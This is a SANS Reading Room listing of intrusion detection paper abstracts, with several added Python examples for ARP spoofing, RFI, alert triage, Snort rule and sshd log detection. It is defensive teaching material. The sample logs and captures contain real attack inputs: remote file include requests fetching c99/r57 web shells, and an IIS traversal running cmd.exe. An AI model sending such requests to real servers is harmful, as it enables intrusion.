Most of the computer security white papers in the Reading Room have been written by students seeking GIAC certification to fulfill part of their certification requirements and are provided by SANS as a resource to benefit the security community at large. SANS attempts to ensure the accuracy of information, but papers are published "as is". Errors or inconsistencies may exist or may be introduced over time as material becomes dated. If you suspect a serious error, please contact firstname.lastname@example.org.
Now more than ever, IT infrastructures are targeted by malicious outsiders, ranging from ideologically motivated groups such as Anonymous (Norton, 2012) to corporations and governments utilizing highly sophisticated Advanced Persistent Threats (Juels & Yen, 2012).
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices.
By: Javier Jimenez Diaz (posted on December 19, 2011)
Not long ago, analog and purpose-built communications systems used to be the prevalent technologies in industrial plants. It was not common to find either interoperability or compatibility among them. In the 1970s, communication networking began to be used in Direct Digital Control (Berge Jonas, 2004).
By: Ratna Deepika Kannan (posted on September 12, 2011)
With the ubiquitous growth of the Internet, retaining its security is a difficult task. Two decades ago, computer systems were generally not connected to the Internet or were simply a part of a small network.
Amongst the various security threats that have evolved lately, the denial-of-service (DoS) attack is, according to security experts, the most destructive. A denial-of-service attack is a method of blocking a service from its intended users.
Helix Pharmaceuticals is worried about security. In the cutthroat world of multi-billion dollar pharmaceutical companies, industrial espionage is a significant concern. In addition, political and social activists continually attempt to disrupt business as retribution for perceived injustices.
"OSSEC is an Open Source Host-based Intrusion Detection System. It performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response" (Trend Micro, 2010).
Software patching for IT departments across the organizational landscape has always been an integral part of maintaining functional, usable and stable software. Historically, the traditional patch cycle has focused on fixing or resolving issues that affect functionality. In recent years, with the advancement of more sophisticated and targeted threats occurring in quicker cycles, this focus is changing dramatically (Risk Assessment – Cisco, n.d.; Executive Office of the United States, 2005). Corporations and governments now have a greater understanding of the potential losses and expenses incurred by not maintaining application security and are moving towards an increased focus on patching and security (Epstein, Grow & Tschang, 2008). With organizations' reputations, consumer confidence and corporate secrets at risk, corporations and governments are recognizing the need to address vulnerabilities at a much faster pace than they historically have (Chan, 2004). Over roughly the last ten years, the length of time between the documentation of a given vulnerability in a piece of software and the development of a working exploit for it has decreased tremendously. According to Andrew Jaquith, senior analyst at Yankee Group, the average time between vulnerability discovery and the release of exploit code is less than one week ("Shrinking time from," 2006). It has also been reported that "99% of intrusions result from exploitation of known vulnerabilities or configuration errors where countermeasures were available" ("Risk reduction and.," 2010). These statistics alone can prove daunting for businesses trying to keep pace and maintain proper defenses.
In this paper, we examine techniques for identifying signatures and anomalies associated with attacks against the data link layer on both wired and wireless networks. Methods for signature-based and anomaly-based detection are not new. Intrusion detection systems such as Snort are quite capable of detecting some of the known data link layer attacks and include a mechanism for integrating Intrusion Prevention System (IPS) solutions. This paper does not advocate against the use of these solutions in organizations. What we present can augment your existing capabilities by detecting attacks to which your IDS may be blind.
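The anomaly-based approach the abstract describes, as an added example that is not code from the paper: it assumes one common data link attack, ARP cache poisoning, in which an attacker answers for an IP address (typically the gateway) with its own MAC. The monitor keeps the first IP-to-MAC binding it sees and flags later replies that contradict it, plus any MAC that claims more IPs than a configurable limit. The reply stream is constructed inline as (sender IP, sender MAC) pairs; a real sensor would take them from a pcap or a raw socket.

```python
"""Data link layer anomaly detection over ARP replies (added example)."""
from collections import defaultdict

# Constructed ARP reply stream, not captured traffic. The last three replies
# show a second MAC taking over the gateway address and then claiming more.
SAMPLE_ARP_REPLIES = [
    ("10.0.0.1", "00:11:22:33:44:01"),   # gateway, first seen
    ("10.0.0.7", "00:11:22:33:44:07"),
    ("10.0.0.1", "00:11:22:33:44:01"),   # repeat of the known binding
    ("10.0.0.1", "de:ad:be:ef:00:99"),   # gateway IP now claimed by another MAC
    ("10.0.0.9", "de:ad:be:ef:00:99"),   # the same MAC claims a second IP
    ("10.0.0.10", "de:ad:be:ef:00:99"),  # and a third
]


class ArpMonitor:
    def __init__(self, max_ips_per_mac=2):
        self.ip_to_mac = {}                  # first binding seen for each IP
        self.mac_to_ips = defaultdict(set)   # every IP each MAC has claimed
        self.max_ips_per_mac = max_ips_per_mac
        self.alerts = []

    def observe(self, ip, mac):
        mac = mac.lower()
        known = self.ip_to_mac.get(ip)
        if known is None:
            self.ip_to_mac[ip] = mac          # learn, never overwrite
        elif known != mac:
            self.alerts.append({"type": "binding_change", "ip": ip,
                                "was": known, "now": mac})
        self.mac_to_ips[mac].add(ip)
        # Fire once, when the count first crosses the limit.
        if len(self.mac_to_ips[mac]) == self.max_ips_per_mac + 1:
            self.alerts.append({"type": "mac_claims_many_ips", "mac": mac,
                                "ips": sorted(self.mac_to_ips[mac])})


def analyze(replies, max_ips_per_mac=2):
    """Run the monitor over a sequence of (ip, mac) replies; return alerts."""
    mon = ArpMonitor(max_ips_per_mac)
    for ip, mac in replies:
        mon.observe(ip, mac)
    return mon.alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_ARP_REPLIES):
        print(alert)
```

Legitimate events produce the same signal (DHCP reassignment, a replaced NIC, HSRP or VRRP virtual MACs), so in practice the binding table is seeded from a known-good inventory and a binding is only re-learned after several consistent replies rather than on the first contradiction.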
The days of installing a firewall at the “edge” of the network and monitoring traffic from a single point have long vanished into the history books. Today's security “edge” has collapsed all the way to the desktop and traffic from practically every system in the network must be monitored, analyzed, and acted on to maintain a secure posture (Cummings, 2004). This type of intense monitoring requires a combination of intrusion detection systems (IDS), event correlation, and analysis.
Historically, the expression “covert channel” has broadly encompassed all communications that are hidden and communicate stealthily between endpoints. The goal of such a channel is not necessarily to obscure the data flowing through the channel, but to obscure the very fact that a channel exists. Often this data may be passed in plain sight of possible observers, but if properly engineered, may remain nearly impossible to detect. Covert channels represent a pure example of security through obscurity.
With today's technology there exist many methods to subvert an information system which could compromise the confidentiality, integrity, or availability of the resource. Due to the abstract nature of modern computing, the only way to be reliably alerted to a system compromise is by reviewing the system's actions at both the host and network layers and then correlating those two layers to develop a thorough view of the system's behaviour. In most instances the computer user has no indication of the existence of the malicious software and therefore cannot be relied upon to determine whether their system is compromised.
Attackers continue to find new methods for penetrating networks and compromising hosts. Therefore, defenders need to look for indications of compromise from as many sources as possible. Collecting and analyzing log data across the enterprise can be a challenging endeavor. However, the wealth of information it provides to intrusion detection analysts is well worth the effort. SIEM solutions can help intrusion detection by collecting all relevant data in a central location and providing customizable alerting and reporting. In addition, SIEM solutions can provide significant value by helping to determine whether or not an incident occurred. The challenge for analysts is creating effective alerts in order to catch today's sophisticated and well-funded attackers.
By: Cristian Ruvalcaba (posted on December 28, 2009)
The importance of IDS in corporate defense is seen as an ever growing necessity. Major strides have been made for numerous IDS tools, but some have seen a stalemate. The next evolutionary step in IDS would involve the concept of a 'Smart Intrusion Detection System (IDS)', one that generates signatures. The question of how to generate these signatures becomes instrumental, and can involve a number of different components. In this case, it could involve a tool that uses a hybrid LaBrea concept.
This paper describes the mechanics of an RFI (remote file include) attack through a code analysis and an attack walk-through on a vulnerable application. Detection is discussed by writing sample IDS signatures and examining the related log files.
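The log-side detection the abstract mentions, as an added example that is not the paper's code: RFI succeeds when an include-style parameter (in PHP, only with allow_url_include enabled) is handed a URL instead of a local file name, so the server fetches and executes attacker-hosted code. The detector below parses Apache combined-format access log lines, URL-decodes every query parameter repeatedly to defeat double encoding, and reports values naming a remote or stream-wrapper resource. The log lines, addresses and file names are constructed.

```python
"""Remote file include (RFI) attempt detection over web server logs (added example)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines (not from the paper).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2009:13:55:36 -0700] "GET /index.php?page=about HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2009:13:55:40 -0700] "GET /index.php?page=http://198.51.100.9/c99.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2009:13:56:01 -0700] "GET /index.php?page=%68%74%74%70%3a%2f%2f198.51.100.9/r57.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
192.0.2.4 - - [10/Oct/2009:13:57:12 -0700] "GET /index.php?page=contact&ref=https://www.example.com/ HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Schemes and wrappers that turn an include into a fetch of attacker content.
RFI_RE = re.compile(r'^(?:(?:https?|ftps?|php|expect|phar)://|data:)', re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded rounds)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text, watched_params=None):
    """Return one hit per query parameter whose decoded value is a remote
    or wrapper resource. watched_params, if given, restricts the check to
    the parameters known to control an include in the application."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            if watched_params and name not in watched_params:
                continue
            value = fully_decode(raw)
            if RFI_RE.match(value.lstrip()):
                hits.append({"src": m["src"], "time": m["ts"], "param": name,
                             "value": value, "status": m["status"]})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG, watched_params={"page"}):
        print(hit)
```

The fourth log line shows why watched_params matters: a referrer or redirect parameter legitimately carries a URL, so flagging every URL-valued parameter produces noise; the include-controlling parameters come from the code analysis of the application. The recorded status code is kept because a 200 on a request that fetched a remote file is the line to escalate.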
Security Whitepaper: How to create a simple, static inventory database and compare security alerts against it to see whether they relate to the host in question. This allows greater visibility into which alerts are actually relevant to the end user's network.
Defending against the Conficker worm and other malware: how individual security updates can be combined, in a SIEM architecture, with other metrics to enhance and tune detection capabilities.
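One way to implement the inventory comparison of the previous abstract and the patch-status enrichment of this one, as a single added example that is not code from either paper: each alert's destination is looked up in a static inventory holding the host's platform, the services on its ports and the security updates it has received, and the alert is graded on whether the targeted platform, port and service match and whether the update that closes the hole is already installed. Hosts, addresses, service names and alert names are constructed; the one real identifier is MS08-067, the Windows Server service bulletin that Conficker exploits over SMB on port 445.

```python
"""Alert relevance and patch-state triage against a host inventory (added example)."""

# Constructed inventory: platform, port -> service, installed security updates.
INVENTORY = {
    "10.1.1.10": {"os": "windows", "services": {80: "iis", 445: "smb"}, "patches": {"MS08-067"}},
    "10.1.1.11": {"os": "windows", "services": {445: "smb"}, "patches": set()},
    "10.1.1.20": {"os": "linux", "services": {22: "ssh", 80: "apache"}, "patches": set()},
}

# Constructed signature metadata: which platform/port/service the attack
# applies to and which update (if any) closes it.
SIGNATURES = {
    "SMB Server Service overflow attempt": {"os": "windows", "port": 445, "service": "smb", "fixed_by": "MS08-067"},
    "IIS unicode directory traversal": {"os": "windows", "port": 80, "service": "iis", "fixed_by": None},
}

# Constructed alerts: (source, destination, destination port, signature name).
SAMPLE_ALERTS = [
    ("203.0.113.9", "10.1.1.10", 445, "SMB Server Service overflow attempt"),
    ("203.0.113.9", "10.1.1.11", 445, "SMB Server Service overflow attempt"),
    ("203.0.113.9", "10.1.1.20", 445, "SMB Server Service overflow attempt"),
    ("203.0.113.9", "10.1.1.20", 80, "IIS unicode directory traversal"),
    ("203.0.113.9", "10.1.1.99", 445, "SMB Server Service overflow attempt"),
]


def triage(alert, inventory=INVENTORY, signatures=SIGNATURES):
    """Grade one alert: unknown-host, irrelevant, mitigated or high."""
    src, dst, dport, sig_name = alert
    host = inventory.get(dst)
    sig = signatures.get(sig_name)
    if host is None or sig is None:
        return "unknown-host"           # inventory gap: review, not dismiss
    if sig["os"] != host["os"]:
        return "irrelevant"             # wrong platform for this exploit
    service = host["services"].get(dport)
    if service is None or service != sig["service"]:
        return "irrelevant"             # port closed or a different daemon
    if sig["fixed_by"] and sig["fixed_by"] in host["patches"]:
        return "mitigated"              # exposed but already patched
    return "high"                       # reachable, matching, unpatched


def triage_all(alerts, inventory=INVENTORY, signatures=SIGNATURES):
    return [(a, triage(a, inventory, signatures)) for a in alerts]


if __name__ == "__main__":
    for alert, grade in triage_all(SAMPLE_ALERTS):
        print(grade.ljust(12), alert)
```

Two caveats a practitioner would attach: "mitigated" is only as good as the patch data, so it belongs in a SIEM as a priority reduction, not a suppression; and an unknown destination is an inventory defect to fix, because an attacker's first foothold is often a host nobody recorded.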
The discipline of network security has as one of its goals the protection of critical business network traffic. There are a number of preventative methods that can be employed to ensure that a network is designed well, but attackers will still attempt to exploit weaknesses to gain access to important business data and systems.
This paper will demonstrate how analysts can begin experimenting with Snort 3.0 today by manually compiling the source code or by simply downloading a preconfigured bootable CD. This paper will also discuss the design of Snort 3.0 and its new features, such as multithreading, native inline bridging, dynamic reconfiguration, and native IPv6 support.
Information systems are more capable today than ever before. Society increasingly relies on computing environments ranging from simple home networks, commonly attached to high-speed Internet connections, to the largest enterprise networks spanning the entire globe. Filing one's tax return, shopping online, banking online, or even reading news headlines posted on the Internet are all so convenient. This increased reliance and convenience, coupled with the fact that attacks are concurrently becoming more prevalent, has elevated the need to have security controls in place to minimize risk as much as possible.
This paper examines one of the assumptions that form the foundations of packet analysis. A discussion of an approach to analyzing protocol stacks is presented. This approach can be used to determine gaps in the protocol stack where an analyst can be misled.
This paper will describe how to install, use, and deploy Tiny Honeypot (THP), written by George Bakos [Bakos, 2002], and then use the data returned by THP to write custom IDS rules. THP completes the incoming connection, records data received, can return custom responses, and simulate any application layer protocol. Completing the TCP connections allows the IDS to see the data payload instead of just the connection attempt.
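The step from captured payload to custom rule, as an added example serving both this abstract and the earlier one on an IDS that generates its own signatures; it is not the paper's code and not part of Tiny Honeypot. It takes request payloads of the kind a honeypot records after completing the TCP handshake and turns the leading bytes of each into a Snort content match. Bytes outside printable ASCII, and the four characters Snort treats specially inside a content string (double quote, pipe, semicolon, backslash), are emitted in |hex| form. The captures are constructed; SIDs from 1000000 upward are the range reserved for local rules.

```python
"""Snort content rules generated from honeypot captures (added example)."""

# Constructed honeypot captures: (destination port, client payload bytes).
SAMPLE_CAPTURES = [
    (80, b"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"),
    (21, b"USER anonymous\r\nPASS -wget@\r\nCWD /incoming\r\n"),
]

# Characters that must not appear literally inside content:"...".
SPECIAL = set(b'"|;\\')


def snort_content(data: bytes) -> str:
    """Render bytes for a Snort content option, hex-escaping anything that is
    not printable ASCII or that Snort gives special meaning."""
    out, hexrun = [], []

    def flush():
        if hexrun:
            out.append("|" + " ".join(f"{b:02X}" for b in hexrun) + "|")
            hexrun.clear()

    for b in data:
        if 0x20 <= b < 0x7F and b not in SPECIAL:
            flush()
            out.append(chr(b))
        else:
            hexrun.append(b)
    flush()
    return "".join(out)


def build_rule(dport, payload, sid, content_len=48, proto="tcp"):
    """One alert rule matching the first content_len bytes of payload at the
    start of a client-to-server stream to dport."""
    content = payload[:content_len]
    return (f"alert {proto} $EXTERNAL_NET any -> $HOME_NET {dport} "
            f'(msg:"THP capture port {dport}"; flow:to_server,established; '
            f'content:"{snort_content(content)}"; depth:{len(content)}; '
            f"sid:{sid}; rev:1;)")


def build_rules(captures, start_sid=1000001, content_len=48):
    """Number rules consecutively from start_sid, one per capture."""
    return [build_rule(port, payload, start_sid + i, content_len)
            for i, (port, payload) in enumerate(captures)]


if __name__ == "__main__":
    for rule in build_rules(SAMPLE_CAPTURES):
        print(rule)
```

A rule cut straight from one capture matches only that byte string, so the useful step afterwards is to trim the content to the invariant part of the attack (the traversal sequence, not the trailing command or HTTP version) and to validate the file with a configuration test run (snort -T) before loading it on a sensor.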
Passive Application Mapping (PAM) is a solution for this problem. In this paper I cover the topics that are vital to understanding and utilizing PAM. I also cover the commercial and public efforts that incorporate PAM to better aid in Intrusion Analysis and network maintenance.
This paper describes a framework to help security personnel have a starting point with which to collect and view security events from devices capable of reporting via syslog. Ideally, the reader will be able to follow along and use this paper in a way similar to a how-to reference guide.
This report is intended to provide information of value to security engineers who are choosing among various solutions to protect their Solaris systems from undesirable changes. In particular, the open-source product "Radmind" is described so it may be effectively compared to other, perhaps more well-known, commercial and open-source filesystem integrity applications.
Maintaining a secure network connected to the Internet is becoming more difficult as time goes on. New viruses are released daily, and higher machine speeds together with more sophisticated and automated tools mean that attackers can scan and attack wide sections of the Internet at once.
The rapid deployment of security patches and anti-virus updates has become a basic need within most IT organizations. The time between the disclosure of a vulnerability and its exploitation continues to decrease while vulnerabilities are becoming easier to exploit and are increasingly severe. Locally enforcing security policy on a large number of computers can be a challenge but keeping remote (VPN or dial-up connected) computers up to date can prove even more difficult.
Computer and network intrusions have been with us since the introduction of the computer, but intrusion detection systems are still somewhat new to the market (the first implementations appeared in the early 1990s).
In today's security landscape, Intrusion detection systems have joined firewalls as "must have" tools, but getting the greatest benefit from these devices requires much more than a deploy and move on strategy.
Over the past few years many papers and books have included articles explaining and supporting either Intrusion Detection Systems (IDS) or the newer technology on the security block, Intrusion Prevention Systems (IPS).
This document outlines separating Snort IDS Collection and Analysis Suite duties across a minimum of three servers (Snort sensor, MySQL database and an ACID web server) to gain optimal coverage and performance.
This paper's objective was to examine the role of the Intrusion Detection System (IDS) in modern security strategies, establish a set of criteria for IDS evaluation, investigate the functionality of PureSecure, an application developed and marketed by Demarc Security, and present conclusions concerning its desirability as a working IDS.
This paper will introduce a Honey Pot known as the Deception Tool Kit (DTK) written by Fred Cohen. It will give an overview of what the DTK is, where to obtain it, how it works, and offers advice about when it should be deployed.
Although all parts of the backup strategy are equally important, this paper will focus on the backup script and will detail a flexible backup script that uses built-in Solaris software tools which create a reliable local backup of a Solaris machine running Oracle.
The paper is designed to: outline the necessity of the implementation of Intrusion Detection systems in the enterprise environment; clarify the steps that need to be taken in order to efficiently implement your Intrusion Detection System; and, describe the necessary components.
By: Kathleen Buonocore (posted on October 31, 2003)
This paper examines five steps to follow when selecting an intrusion detection system (IDS): identify the need, gain a general understanding of intrusion detection systems, gain a detailed understanding of the network, evaluate various IDS systems, and determine policy and procedures.
This paper focuses on Network ID Systems, and discusses the technical detail behind techniques that can be employed to counteract the utility of these systems and identifies tools that actually use the techniques described.
This paper will examine the intrusion detection systems, one of the relative new technologies in information security. It aims to explore, in high level, the intrusion detection systems available today, as well as new developments in the technology.
The aim of this paper is to examine the origins of detecting, analysing and reporting of malicious activity, where it is today and where it appears to be heading in the future. Some of the many techniques and tools presently used in Network defence will be explored as well.
This paper will look at one system administrator's attempts to contact host owners of machines that scan or probe her network. After a brief discussion of various ways to identify possible contacts, this person's data will be used to show how different sites may respond and how probes have multiplied over a definitive period of time. The paper concludes by mentioning two projects that might help the overburdened system/network/security administrator to simplify the whole process of contacting a host owner.
This paper aims to help BlackICE IDS administrators by identifying and classifying some events frequently seen by IDS agents in two common deployments - on a DMZ web server and on systems within an internal (mainly Microsoft) network.
This paper presents requirements for an Intrusion Detection System (IDS), as well as an analysis of currently available IDS software packages and a recommendation of the best HIDS package to manage a suite of Solaris machines.
This paper describes Intrusion Detection Systems (IDS) and compares the two main categories of detection principles, signature detection and anomaly detection; also described is a new type of anomaly detection based on protocol standards.
By: Thomas Goeldenitz (posted on October 31, 2003)
This paper is not intended to predict the future, but bring to light emerging technologies and trends in the field of IDS that could make the life of the security specialist easier (if there is such a thing).
Choosing the right software for an intrusion detection system can be a challenging task that often requires extensive research. While there are many different products available, Tripwire from Tripwire Inc. and Symantec's Intruder Alert offer two possible solutions for a host-based intrusion detection system.
In my Kickstart paper I covered basic Unix log files with a configuration file that gathered everything. I would like to expand on that and now cover messages found in those log files that would cause concern and require further investigation.
By: Jon-Michael C. Brook (posted on October 31, 2003)
The following discussion centers on the benefits and drawbacks of rule-based Intrusion Detection tailoring, and how, overall, it is best to leave tailoring for Network IDS systems to the product vendors.
By: Heather M. Larrieu (posted on October 31, 2003)
This paper outlines the role and issues with the use of the SSH protocol, types and methods of intrusion detection, and proposes techniques and an architecture for an intrusion detection system that uses the SSH daemon as a sensor.
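The sensor-to-analysis path described here, together with the earlier abstracts on collecting events over syslog and on log messages that warrant investigation, as one added example that is not code from any of those papers: sshd reports every authentication outcome through syslog, so a collector that parses BSD-style syslog lines can treat the daemon as a sensor and raise findings for a run of failed logins from one source, a successful login from a source that had just been failing, and a failed su to root. The log lines, hosts and addresses are constructed; the message formats are those written by OpenSSH's sshd and pam_unix.

```python
"""Syslog parsing with sshd as an authentication sensor (added example)."""
import re
from collections import Counter

# Constructed BSD-style syslog lines (not from the paper).
SAMPLE_SYSLOG = """\
Oct 11 22:14:15 host1 sshd[1024]: Failed password for invalid user admin from 203.0.113.7 port 4411 ssh2
Oct 11 22:14:17 host1 sshd[1025]: Failed password for root from 203.0.113.7 port 4412 ssh2
Oct 11 22:14:19 host1 sshd[1026]: Failed password for root from 203.0.113.7 port 4413 ssh2
Oct 11 22:14:22 host1 sshd[1027]: Accepted password for root from 203.0.113.7 port 4414 ssh2
Oct 11 22:20:01 host1 su: pam_unix(su:auth): authentication failure; logname=bob uid=1001 euid=0 tty=pts/1 ruser=bob rhost=  user=root
Oct 11 22:30:00 host2 sshd[880]: Accepted publickey for deploy from 10.1.1.5 port 5022 ssh2
Oct 11 22:31:00 host1 CRON[900]: (root) CMD (run-parts /etc/cron.hourly)
"""

SYSLOG_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) '
    r'(?P<prog>[^:\[\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$')
FAILED_RE = re.compile(r'Failed \S+ for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)')
ACCEPTED_RE = re.compile(r'Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<src>\S+)')
SU_FAIL_RE = re.compile(r'authentication failure;.*logname=(?P<from>\S*).*\buser=(?P<to>\S+)')


def parse_syslog(text):
    """Split each line into timestamp, host, program, pid and message."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def review(text, fail_threshold=3):
    """Return findings worth an analyst's attention, in log order."""
    findings = []
    failures = Counter()   # (host, source IP) -> failed sshd logins so far
    for ev in parse_syslog(text):
        host, prog, msg = ev["host"], ev["prog"], ev["msg"]
        if prog == "sshd":
            m = FAILED_RE.search(msg)
            if m:
                key = (host, m["src"])
                failures[key] += 1
                if failures[key] == fail_threshold:     # fire once per source
                    findings.append({"type": "ssh_bruteforce", "host": host,
                                     "src": m["src"], "time": ev["ts"]})
                continue
            m = ACCEPTED_RE.search(msg)
            if m and failures[(host, m["src"])]:
                findings.append({"type": "ssh_success_after_failures", "host": host,
                                 "src": m["src"], "user": m["user"], "time": ev["ts"]})
        elif prog == "su":
            m = SU_FAIL_RE.search(msg)
            if m:
                findings.append({"type": "su_failure", "host": host,
                                 "from": m["from"], "to": m["to"], "time": ev["ts"]})
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_SYSLOG):
        print(finding)
```

The success-after-failures rule is the one that pays for the collector: a burst of failures alone is background noise on any Internet-facing sshd, while a login from the same source right after it is the event to page on. Note that the counter is keyed per host; a slow scan spread across many hosts from one source needs the same counter keyed on source alone, which the central syslog view makes possible and a single host's logs do not.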
By: Brian K. Sheffler (posted on October 31, 2003)
The purpose of this paper is to inform and educate security professionals about the analytical potential of using a tool or technique that renders visual representations of the data/traffic that traverses a given network. The emphasis is on the design and theory behind such tools. Included are examples of data visualization products that are commercially available.
This paper will focus on intrusion detection systems in general, and specifically on two examples of the most promising new weapon in the battle against Internet hackers and worms: distributed intrusion detection.
The paper discusses the implementation of ManHunt, a pilot version of the protocol-anomaly-based NIDS offered by Recourse Technologies, which was evaluated against the high-level functional requirements detailed in the following case study.
This paper documents the procedure that I set up to automate collecting and sending intrusion attempt information to Incidents.org and the Internet Storm Center, then discusses my results and some possible next steps.
A number of distributed intrusion detection systems (dIDS) with global scope have been active for several years, and five of these are discussed and compared with each other in terms of focus, data source, notification tools, available agents, statistical reporting tools and linkage to security and vulnerability information.
This paper explores the current state of Intrusion Detection Systems (IDS) technology, identifies system requirements and essential elements in the context of an overall architecture; and it highlights several systems, available today, that fit nicely into the suggested architecture.